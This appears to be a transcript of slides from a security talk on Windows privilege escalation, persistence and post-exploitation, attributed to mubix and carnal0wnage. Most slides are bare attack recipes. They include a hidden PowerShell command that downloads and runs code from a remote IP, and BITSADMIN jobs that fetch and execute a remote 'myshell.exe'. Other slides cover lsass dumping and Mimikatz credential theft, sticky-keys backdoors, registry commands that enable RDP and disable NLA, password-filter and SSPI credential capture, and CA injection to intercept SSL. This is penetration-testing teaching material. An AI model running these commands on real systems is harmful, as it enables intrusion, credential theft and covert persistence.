  • 24. Service Quoting (Manual) sc query Get list of services sc qc skypeupdate [SC] QueryServiceConfig SUCCESS SERVICE_NAME: skypeupdate TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : "C:Program Files (x86)SkypeUpdaterUpdater.exe" <--Not Vulnerable LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Skype Updater DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem
  • 25. Service Quoting (Manual) sc query Get list of services sc qc LENOVO.TPKNRSVC [SC] QueryServiceConfig SUCCESS SERVICE_NAME: LENOVO.TPKNRSVC TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe <--Vulnerable LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Lenovo Keyboard Noise Reduction DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  • 26. Service Quoting Example: NVIDIA Update Service Daemon C:Program Files (x86)NVIDIA CorporationNVIDIA Update Coredaemonu.exe C:Program.exe C:Program Files (x86)NVIDIA.exe C:Program Files (x86)NVIDIA CorporationNVIDIA.exe Lenovo Keyboard Noise Reduction C:Program FilesLenovoCommunications UtilityTPKNRSVC.exe C:Program.exe C:Program FilesLenovoCommunications.exe
  • 27. DLL Loading or Bad permissions fxsst.dll - looks in C:Windows first, the where it really is C:WindowsSystem32 Source: https://github.com/rapid7/metasploit-framework/pull/1103
  • 28. Pentest Monkey Script to Check pentest monkey’s priv check tool Source: http://pentestmonkey.net/tools/windows-privesc-check
  • 30. MSF getsystem getsystem -t 1 :-) requires meterpreter work anywhere else? can do manually?
  • 31. Sysinternals psexec psexec -i -s -d cmd.exe psexec: http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
  • 32. Binary Replacement Replace binary called by a service with YOUR binary 1. stop service 2. replace binary 3. start service **Usually works for Power Users too** Source: http://www.madhur.co.in/blog/2011/09/23/privilegeescalation.html
  • 33. WMIC wmic /node:DC1 /user: DOMAINdomainadminsvc /password: domainadminsvc123 process call create "cmd /c vssadmin list shadows 2>&1 > C: tempoutput.txt" Source: http://www.room362.com/blog/2013/6/10/volume-shadow-copy-ntdsdit-domain-hashes-remotely-part1. html
  • 34. AT at 13:20 /interactive cmd net use targetserver /user:DOMuser pass net time targetserver at targetserver 13:20 C:tempevil.bat Executes as SYSTEM Must be an admin to do it Easy way to check "whoami /groups" on Vista+
  • 35. Debugging CMD.exe Start the debugging: at 13:37 C:debuggersremote.exe /s cmd SYSCMD Connect to the debugger: C:debuggersremote.exe /c 127.0.0.1 SYSCMD NTSD can be used for this as well Source: http://carnal0wnage.attackresearch.com/2013/07/admin-to-system-win7-with-remoteexe.html NTSD: http://www.securityaegis.com/ntsd-backdoor/
  • 36. schtasks Wonderful new features! 1. Any user can create a task 2. I have new options other than "ONCE", like ONIDLE, ONLOGON, and ONSTART Scenario 1: ONIDLE run my C2 check-in binary Scenario 2: ONLOGON run my cred dumper bin Scenario 3: ONSTART copy evil bin to random location and start it.
  • 37. Bypass UAC w/ Creds UAC will not let local accounts authenticate locally to elevate past UAC Domain accounts have no such restriction. Utilize Metasploit's PSEXEC + Domain account that is an admin on the box you are on = No UAC no more. Source: http://mubix.github.io/blog/2013/08/11/psexec-uac-bypass-with-credentials/
  • 39. Passwords - best persistence method WCE and Mimikatz wdigest (your AD password) kerberos (your LM / NTLM hash) ssp (your Outlook password) livessp (your windows8 password) msv (your AD password) tspkg (your AD password) WCE: http://www.ampliasecurity.com/research/wcefaq.html Mimikatz: http://blog.gentilkiwi.com/mimikatz
  • 40. Passwords through process dumping net use targetserver /user:DOMuser pass copy procdump.exe targetserverc$ copy procdump.bat targetserverc$ procdump.exe -ma lsass %CNAME%.dmp at targetserver 13:37 C:procdump.bat copy targetserverc$targetserver.dmp . game over... Source: http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a. html
  • 41. Ol’ Reliable Put binary or .bat script in a startup folder yeah shouldnt work, but it does… Registry run keys
  • 42. SETHC / UTILMAN Replace %WINDIR%System32sethc.exe Replace %WINDIR%System32utilman.exe Hit SHIFT 5 times = sethc.exe run by SYSTEM Win Key + U = utilman.exe run by SYSTEM Files locked by Windows, must be done "offline" If NLA (Network Layer Authentication) is enabled, won't work If RDP is disabled, won't work Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
  • 43. SETHC / UTILMAN - NO REBOOT HKLMSoftwareMicrosoftWindows NTCurrentVersionImage File Execution Options make a key called "sethc.exe" make a REG_SZ value called "Debugger" (capitalized) give it "calc.exe" as the value Hit SHIFT 5 times. Source: http://carnal0wnage.attackresearch.com/2012/04/privilege-escalation-via-sticky-keys.html
  • 44. SETHC / UTILMAN - CONNECTIVITY Enable RDP: reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin al Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f Disable NLA: reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTermin al ServerWinStationsRDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f Firewall exception for RDP: netsh firewall set service type = remotedesktop mode = enable Source: http://www.room362.com/blog/2012/5/25/sticky-keys-and-utilman-against-nla.html
  • 45. Teredo IPv6 + Bindshell netsh interface ipv6 install netsh interface ipv6 teredo enterpriseclient netsh interface ipv6 teredo set client teredo. managemydedi.com msfpayload windows/meterpreter/bind_ipv6_tcp Create a loop that runs the payload, then pings your IPv6 address, wait for user to take their laptop home. Source: http://www.room362.com/blog/2010/9/24/revenge-of-the-bind-shell.html
  • 46. Rename on next reboot HKLMSystemCurrentControlSetControlSessi on ManagerPendingFileRenameOperations Image from: http://education.aspu.ru/view.php?wnt=280
  • 47. Exporting Wireless Configs netsh wlan export profile key=clear <sharedKey> <keyType>passPhrase</keyType> <protected>false</protected> <keyMaterial>myPasswrd</keyMaterial> </sharedKey> Source: http://www.digininja.org/metasploit/getwlanprofiles.php
  • 48. Powershell Downloader Schedule this and it will execute the shellcode on that page, pulling it each time (so you can change as needed) powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient). downloadstring('http://192.168.172.1: 8080/myHbBywMxOSB'))" Source: http://securitypadawan.blogspot.com/2013/07/authenticated-metasploit-payloads-via.html
  • 49. BITSADMIN Downloader/Exec bitsadmin /create mybackdoor BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Created job {6C79ABFA-F7AA-4411-B74D- B790666E130F}. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 50. BITSADMIN Downloader/Exec bitsadmin /addfile mybackdoor http://192. 168.222.150/myshell.exe C: windowstempmyshell.exe BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Added http://192.168.222.150/myshell.exe -> C:windowstempmyshell.exe to job. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 51. BITSADMIN Downloader/Exec bitsadmin /SETMINRETRYDELAY mybackdoor 86400 BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. Minimum retry delay set to 86400. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 52. BITSADMIN Downloader/Exec bitsadmin /SETNOTIFYCMDLINE mybackdoor C: windowstempmyshell.exe NULL BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. notification command line set to 'C: windowstempmyshell.exe' 'NULL'. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 53. BITSADMIN Downloader/Exec bitsadmin /getnotifycmdline mybackdoor the notification command line is 'C: windowstempmyshell.exe' 'NULL' bitsadmin /listfiles mybackdoor 0 / UNKNOWN WORKING http://192.168.222.150 /myshell.exe -> C:windowstempmyshell.exe bitsadmin /RESUME mybackdoor Job resumed. Source: https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394
  • 54. Password Filters (requires reboot) Dump DLL in %WINDIR%System32 Update: HKLMSYSTEMCurrentControlSetControlLsa Notification Packages Sit and wait for clear text passwords as defined functionality by Microsoft: http://msdn.microsoft.com/en- us/library/windows/desktop/ms721882(v=vs.
  • 55. Password Filters hooking, no reboot Reflective DLL injection w/ Powershell (in- memory) hooking.
  • 56. SSPI (requires reboot) Kiwissp.dll 1. compile 2. drop in system32 3. “Security Packages” registry key 4. wait for passwords
  • 57. Command Line PPTP Tunnel post/windows/manage/pptp_tunnel Create a PPTP tunnel between victim and attacker. Microsoft intentionally created PPTP to be resilient to network drops and changes. Source: http://www.shelliscoming.com/2013/06/metasploit-man-in-middle-through-pptp.html
  • 58. Just uninstall a patch Not recommended for clients, but if you need back on a system, make it vulnerable.
  • 61. LNK (Shortcuts) with UNC icons Create a shortcut to anything (cmd.exe) Go to Properties -> Change Icon and give it a UNC path. Source http://www.room362.com/blog/2012/2/11/ms08_068-ms10_046-fun-until-2018.html
  • 62. Auth and Persistence Anyone see what I did? Source: http://carnal0wnage.attackresearch.com/2013/09/finding-executable-hijacking.html Used in conjunction with this REG key can be devastating: HKLMSYSTEM CurrentControlSetControl Session Manager CWDIllegalInDllSearch = 0
  • 63. Misc
  • 64. WinRM Windows Remote Management - includes WinRS (Windows Remote Shell) Listens on 5985/5986 by default, allows interactive shell access over HTTP. Old versions and those installed with IIS are on 80 Found by asking servers for /wsman and recording 402s
  • 65. Injecting CAs post/windows/manage/inject_ca & remove_ca Throws a CA on a system, code signing, web, etc. Can be used to bypass application whitelisting (if "signed-good" binaries are allowed) Also can allow you to proxy all SSL traffic for a user, without any warnings to them. vt ( Nick Freeman @ Security-Assessment.com )
  • 66. WPAD, WPADWPADWPAD & LLMNR Auto detects proxy Looks for WPAD IPv6 version (LLMNR) Looks for WPADWPADWPAD You get to set their proxy information ;-)
  • 67. PORTPROXY Basically port forwarding built into Windows Firewall. Modes: v4tov4 v4tov6 v6tov4 v6tov6 Oh yea… Plus if you’re lazy (there is a module for that): post/windows/manage/portproxy
  • 68. Abusing PORTPROXY LNK UNC attack to a share that doesn't exist Windows will auto-try WebDAV PORTPROXY on 80 out over IPv6/teredo Since Windows is connecting "internally" the hosts will auto-authenticate .. Invisible
  • 69. Stealing SSL Cookies logman start LogCookies -p Microsoft-Windows-WinInet -o logcookies.etl -ets wevtutil qe logcookies.etl /lf:true /f:Text | find /i "cookie added" wevtutil qe logcookies.etl /lf:true /f:Text | find /i "POST" logman stop LogCookies -ets Mark Baggett Source: http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
  • 70. Breaking NetNTLMv1 http://markgamache.blogspot. com/2013/01/ntlm-challenge-response-is-100- broken.html PoC turns NetNTLMv1 into this format: $99$ASNFZ4mrze8lqYwcMegYR0ZrKbLfRoDz2Ag= Cloudcrack.com will turn that into straight NTLM in 23 hours.
  • 71. DEP Exclusions DEP OptOut can be annoying and stop binaries from running. Adding your binary to: HKLMSoftwareMicrosoftWindows NTCurrentVersionAppCompatFlagLayers with the value "DisableNXShowUI". Doesn’t work This does: rundll32 sysdm.cpl, NoExecuteAddFileOptOutList "C: tempevil.exe" Source: http://hackingnotes.com/post/add-executable-to-dep-exclusion-from-the-command-line
  • 72. Zone Transfer via AD Domain Admin can run this (powershell): PS C:Usersjdoe> get-wmiobject - ComputerName dc1 -Namespace rootmicrosoftDNS - Class MicrosoftDNS_ResourceRecord -Filter "domainname='projectmentor.net'" | select textrepresentation Source: http://marcusoh.blogspot.com/2012/06/enumerating-dns-records-with-powershell.html
  • 74. Zone Transfer via AD Users can run this (powershell): ● PS C:Usersjdoe> dns-dump.ps1 -zone projectmentor. net -dc dc1 ● C:> powershell -ep bypass -f dnsdump.ps1 -zone projectmentor.net -dc dc1 Code: https://github. com/mmessano/PowerShell/blob/master/dns- dump.ps1 Source: http://www.indented.co.uk/index.php/2009/06/18/mapping-the-dnsrecord-attribute/
  • 75. END @mubix @carnal0wnage Mubix “Rob” Fuller mubix@hak5.org Chris Gates chris@carnal0wnage.com
  • 76. Abstract A follow on to the Encyclopaedia Of Windows Privilege Escalation published by InsomniaSec at Ruxcon 2011, this talk is aimed at detailing not just escalation from user to admin and admin to system, but persistence and forced authentication as well as a few other treats.